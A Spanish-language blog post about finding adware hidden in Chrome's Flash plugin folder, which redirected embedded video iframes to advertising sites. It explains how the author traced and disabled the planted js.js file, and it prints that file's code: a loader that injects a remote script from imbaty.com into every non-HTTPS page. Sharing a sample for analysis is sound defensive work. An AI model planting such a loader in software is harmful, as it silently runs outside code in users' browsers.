Adware, el spyware publicitario

Mi amiguita SANDRA PERLAZA en MCDONALDS junto a PITUFINA

Destaca la inocencia con la que estos programas se camuflan…

Hace una semana empecé a notar que en mi PC con CHROME en los sitios donde habían videos de youtube (embebidos) me aparecía una propaganda, le pasé antivirus (avast y el eset online), antispyware (malwarebytes y Spybot Search & Destroy) y traté de desinstalar extersiones sin que esto me produjera un efecto positivo.

Luego me puse de curioso, hasta que me di cuenta que en toda página se insertaba un código en javascript que se encargaba de redireccionar los contenidos de los iframe a las webs de publicidades, claro está tratando de ocupar el frame con una publicidad del tamaño mas adecuado.

Para hallar el problema, utilicé el inspector de la herramienta de desarrolladores webs de CHROME, en MOZILLA se podría usar FIREBUG; creé una página web que tuviera un iframe y luego rastree que archivos externos cargaba, así encontré el nombre de la extensión que se encargaba de descargar el malicioso archivo.  Resulta que esta extensión era “peidmdfccinlepbampikfomemdbbmhgk”, la busqué en el EXPLORADOR DE WINDOWS y gran sorpresa que me llevé al enterarme que la extensión es el plugin de FLASH…

Sucede que en algún momento se bajó un spyware o adware o incluso una de esas famosas barras de herramientas para los navegadores que no sirven para nada (solo para estorbar y robar tamaño a la pantalla) y esta buscó en que carpeta estaba instalado el plugin de flash e insertó un archivo llamado js.js , este archivo es ejecutado por CHROME cada vez que utiliza la extensión, obligando que toda vez que se cargara un contenido flash este fuera reemplazado por el adware.

Simplemente renombré el archivo y asunto solucionado, copio el contenido del archivo para que lo puedan analizar.

function loadScript() {

                if ('https:' == document.location.protocol) { return false; }

                var s = document.createElement('script');

                s.setAttribute("type","text/javascript");

                s.setAttribute("src", "http://imbaty.com/plugin/script.js");

                var head = (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]);

                if (head!=null) {

                head.appendChild(s);

                 }

}

loadScript();

Este archivo se encarga de descargar un archivo más extenso, elaborado y actualizadable de forma centralizada para el programador.